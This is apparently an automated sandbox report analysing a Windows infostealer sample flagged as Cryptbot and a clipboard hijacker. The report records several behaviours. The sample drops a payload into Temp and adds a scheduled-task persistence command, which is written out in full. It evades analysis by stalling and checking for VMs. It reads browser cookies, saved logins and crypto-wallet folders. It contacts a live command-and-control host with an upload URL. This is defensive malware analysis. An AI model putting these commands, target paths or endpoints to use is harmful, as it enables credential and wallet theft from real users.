Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: izimiifxxrvtvohfozzw.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: file.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: file.exe

Static file information: File size 9969664 > 1048576

Source: file.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x2bfc00
Source: file.exe	Static PE information: Raw size of .data is bigger than: 0x100000 < 0x671000

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 4_2_00CB8230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError,

4_2_00CB8230

Source: file.exe	Static PE information: section name: .eh_fram
Source: service123.exe.0.dr	Static PE information: section name: .eh_fram
Source: IZImiIFXXrvtVOHFozZW.dll.0.dr	Static PE information: section name: .eh_fram

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_00CBA564 push es; iretd	4_2_00CBA694
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3C8C2A push edx; mov dword ptr [esp], ebx	4_2_6C3C8C3E
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3F4DB0 push eax; mov dword ptr [esp], ebx	4_2_6C3F5018
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3D4DC1 push eax; mov dword ptr [esp], ebx	4_2_6C3D4DD5
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3C6E03 push edx; mov dword ptr [esp], ebx	4_2_6C3C6E17
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3D4FA1 push eax; mov dword ptr [esp], ebx	4_2_6C3D4FB5
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3FE860 push eax; mov dword ptr [esp], ebx	4_2_6C3FE98B
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3D285C push edx; mov dword ptr [esp], ebx	4_2_6C3D2870
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3E8850 push eax; mov dword ptr [esp], ebx	4_2_6C3E8E4F
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3D0852 push eax; mov dword ptr [esp], ebx	4_2_6C3D0866
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C4309E0 push eax; mov dword ptr [esp], edi	4_2_6C430B5A
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C4029A0 push eax; mov dword ptr [esp], ebx	4_2_6C402CD4
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C4029A0 push edx; mov dword ptr [esp], ebx	4_2_6C402CF3
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3FEAC0 push eax; mov dword ptr [esp], ebx	4_2_6C3FEBE3
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3D4BE1 push eax; mov dword ptr [esp], ebx	4_2_6C3D4BF5
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C410460 push eax; mov dword ptr [esp], ebx	4_2_6C4107FF
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3D8451 push 890005EAh; ret	4_2_6C3D8459
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3C0452 push eax; mov dword ptr [esp], ebx	4_2_6C3C048A
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3C04BE push eax; mov dword ptr [esp], ebx	4_2_6C3C048A
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3C04AD push eax; mov dword ptr [esp], ebx	4_2_6C3C048A
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3C64A3 push edx; mov dword ptr [esp], ebx	4_2_6C3C64B7
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3CA527 push eax; mov dword ptr [esp], ebx	4_2_6C3CA53B
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3A1AAA push eax; mov dword ptr [esp], ebx	4_2_6C456622
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3A1AAA push eax; mov dword ptr [esp], ebx	4_2_6C456622
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3CA6F7 push eax; mov dword ptr [esp], ebx	4_2_6C3CA70B
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3A6003 push eax; mov dword ptr [esp], ebx	4_2_6C456AF6
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3A6003 push edx; mov dword ptr [esp], edi	4_2_6C456B36
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3A6098 push eax; mov dword ptr [esp], ebx	4_2_6C456622
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3D40D5 push ecx; mov dword ptr [esp], ebx	4_2_6C3D40E9
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3C81E5 push edx; mov dword ptr [esp], ebx	4_2_6C3C81F9
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3C023B push eax; mov dword ptr [esp], ebx	4_2_6C3C0251

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\service123.exe			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\IZImiIFXXrvtVOHFozZW.dll			Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Evasive API call chain: CreateMutex,DecisionNodes,Sleep

graph_4-158141

Found stalling execution ending in API Sleep call

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Stalling execution: Execution stalls by calling Sleep

graph_4-158142

Source: C:\Users\user\Desktop\file.exe

Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Window / User API: threadDelayed 802

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe

API coverage: 1.1 %

Source: C:\Users\user\Desktop\file.exe TID: 5736	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 5688	Thread sleep count: 802 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 5688	Thread sleep time: -80200s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Source: file.exe	Binary or memory string: VMware
Source: file.exe, 00000000.00000003.2332149928.000000000E24B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: file.exe, 00000000.00000003.2332149928.000000000E24B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: file.exe, 00000000.00000003.2332149928.000000000E24B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: file.exe, 00000000.00000003.2332149928.000000000E24B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: file.exe, 00000000.00000003.2332149928.000000000E24B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: file.exe, 00000000.00000003.2332149928.000000000E24B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: file.exe, 00000000.00000002.2798866199.0000000001FF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2290854953.0000000001FF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2798866199.0000000001FAE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000003.2332149928.000000000E24B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: file.exe, 00000000.00000003.2332149928.000000000E24B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: file.exe, 00000000.00000003.2332149928.000000000E24B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: file.exe, 00000000.00000003.2332149928.000000000E24B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: file.exe, 00000000.00000003.2332149928.000000000E24B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: file.exe, 00000000.00000003.2332149928.000000000E24B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: file.exe, 00000000.00000003.2332149928.000000000E24B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: file.exe, 00000000.00000003.2332149928.000000000E24B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: file.exe	Binary or memory string: !d->m_output_flush_remainingd->m_pOutput_buf < d->m_pOutput_buf_endmax_match_len <= TDEFL_MAX_MATCH_LEN(match_len >= TDEFL_MIN_MATCH_LEN) && (match_dist >= 1) && (match_dist <= TDEFL_LZ_DICT_SIZE)d->m_lookahead_size >= len_to_movevisaSpellingProtectSpeechReadyForiTop PDFCiscoSparkLauncherWebExCiscoSparkdotnetEvent ViewerF12BlendBaiduHP_Easy_StartSmartSteamEmuBrowserCacheseeedwodlholdhodlSketchUpbandlab-assistantvlcPixelSeeCLR_v4.0CLR_v2.0_32webCachesHoYoversepocopedaTwitch StudioWebTorrentLibrarymopnmbcafieddcagagdcbnhejhlodfddbhhhlbepdkbapadjdnnojkbgioiodbicopcgpfmipidbgpenhmajoajpbobppdilnngceckbapebfimnlniiiahkandclblbVsGraphicsWindowsAppsvshubWindows Sidebaroptimization_guide_prediction_model_downloadsUXP.android.cache.gradleVALORANTNichromeMetroOpenOfficeVodafoneClickUpDATAparkXiaomiDevice MetadataWindows Live ContactsWindows StorecacheCommsConnectedDevicesPlatformaddonscachesLocal StorageAugLoopMcAfee_Inclinknowmt-center.chiadaoexporttokenWorldOfTanksWargaming.netPlay GamesAutoItVirtualBoxreposiCloudDriveVMwareFree_PDF_SolutionsLenovoServiceBridgeMega LimitedMEGAsyncLogiShrd@
Source: file.exe, 00000000.00000003.2332149928.000000000E24B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: file.exe, 00000000.00000003.2332149928.000000000E24B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: file.exe, 00000000.00000003.2332149928.000000000E24B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: file.exe, 00000000.00000003.2332149928.000000000E24B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: file.exe, 00000000.00000003.2332149928.000000000E24B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2332149928.000000000E24B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: file.exe, 00000000.00000003.2332149928.000000000E24B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: file.exe, 00000000.00000003.2332149928.000000000E24B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: file.exe, 00000000.00000003.2332149928.000000000E24B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: file.exe, 00000000.00000003.2332149928.000000000E24B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2332149928.000000000E24B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: file.exe, 00000000.00000003.2332149928.000000000E24B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: file.exe, 00000000.00000003.2332149928.000000000E24B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2332149928.000000000E24B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: file.exe, 00000000.00000003.2332149928.000000000E24B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: file.exe, 00000000.00000003.2332149928.000000000E24B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: file.exe, 00000000.00000003.2332149928.000000000E24B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 4_2_00CB8230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError,

4_2_00CB8230

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_00CB116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit,	4_2_00CB116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_00CB11A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,	4_2_00CB11A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_00CB1160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,	4_2_00CB1160
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_00CB13C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,	4_2_00CB13C9

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 4_2_6C408280 cpuid

4_2_6C408280

Source: C:\Users\user\Desktop\file.exe

Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Clipboard Hijacker

Source: Yara match	File source: 4.2.service123.exe.6c380000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2778604141.00000000049F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 2228, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: service123.exe PID: 7148, type: MEMORYSTR

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: file.exe PID: 2228, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe	String found in binary or memory: \Electrum-btcp\wallets
Source: file.exe	String found in binary or memory: \ElectronCash\wallets
Source: file.exe, 00000000.00000000.2179196660.0000000001832000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: \@trezor\Exodus\backupExodus backup\MultiBitHDMultiBit HD\Electrum\wallets\ElectronCash\walletsElectron Cash\Electrum-btcp\walletsElectrum BTCP\walletsUnknown Wallet (Folder - wallets)\Exodus EdenDogecoin
Source: file.exe	String found in binary or memory: \Jaxx
Source: file.exe	String found in binary or memory: \Exodus\backup
Source: file.exe	String found in binary or memory: Exodus\
Source: file.exe	String found in binary or memory: Ethereum (UTC)

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Source: Yara match

File source: Process Memory Space: file.exe PID: 2228, type: MEMORYSTR

Remote Access Functionality

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: file.exe PID: 2228, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	11 Process Injection	1 Masquerading	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 DLL Side-Loading	1 Scheduled Task/Job	2 Virtualization/Sandbox Evasion	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	2 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	11 Process Injection	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	2 Clipboard Data	112 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	2 File and Directory Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	22 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
analforeverlovyu.top	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
fivevh5pt.top	84.38.182.221	true	true		unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
fivevh5pt.top	true		unknown
analforeverlovyu.top	true	URL Reputation: safe	unknown
@fivevh5pt.top	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	file.exe, 00000000.00000003.2331655300.0000000003EAF000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/chrome_newtab	file.exe, 00000000.00000003.2331655300.0000000003EAF000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://gcc.gnu.org/bugs/):	IZImiIFXXrvtVOHFozZW.dll.0.dr	false		unknown
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000003.2331655300.0000000003EAF000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	file.exe, 00000000.00000003.2331655300.0000000003EAF000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://fivevh5pt.top/9	file.exe, 00000000.00000003.2290854953.0000000001FDB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://serviceupdate32.com/update	file.exe	false		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000003.2331655300.0000000003EAF000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000003.2331655300.0000000003EAF000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://fivevh5pt.top/v1/upload.php	file.exe, 00000000.00000002.2798866199.0000000001FE8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000003.2331655300.0000000003EAF000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	file.exe, 00000000.00000003.2331655300.0000000003EAF000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	file.exe, 00000000.00000003.2331655300.0000000003EAF000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
84.38.182.221	fivevh5pt.top	Russian Federation		49505	SELECTELRU	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1521587
Start date and time:	2024-09-29 00:52:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@8/2@1/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 20.190.159.71, 40.126.31.71, 20.190.159.68, 20.190.159.75, 40.126.31.73, 40.126.31.69, 20.190.159.73, 40.126.31.67
Excluded domains from analysis (whitelisted): client.wns.windows.com, prdv4a.aadg.msidentity.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, ocsp.edge.digicert.com, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
Execution Graph export aborted for target file.exe, PID 2228 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
00:54:16	Task Scheduler	Run new task: ServiceData4 path: C:\Users\user\AppData\Local\Temp\/service123.exe
18:53:23	API Interceptor	3x Sleep call for process: file.exe modified
18:54:48	API Interceptor	503x Sleep call for process: service123.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
84.38.182.221	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot, Neoreklami, Socks5Systemz	Browse	fivevh5ht.top/v1/upload.php
	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	fivevh5ht.top/v1/upload.php
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	twelvevf12vt.top/v1/upload.php
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	twelvevf12vt.top/v1/upload.php
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	twelvevf12vt.top/v1/upload.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
fp2e7a.wpc.phicdn.net	http://virasimex.com/wpadmin	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	http://ivo-telegram.org/	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://swiftversedapp.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	https://ardam.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	http://krakennylog.gitbook.io/	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	https://dappnoderestore.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	http://nftpack83.vercel.app/	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	http://nfthit7.vercel.app/	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	http://sellerthirteen.eur-tiktokshop.com/	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://sellerfourth.eur-tiktokshop.com/	Get hash	malicious	Unknown	Browse	192.229.221.95

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SELECTELRU	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	37.9.4.189
	file.exe	Get hash	malicious	LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5Systemz	Browse	176.113.115.95
	https://www.lightsourcebp.com/	Get hash	malicious	Unknown	Browse	37.9.4.115
	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot, Neoreklami, Socks5Systemz	Browse	84.38.182.221
	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	37.9.4.189
	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	84.38.182.221
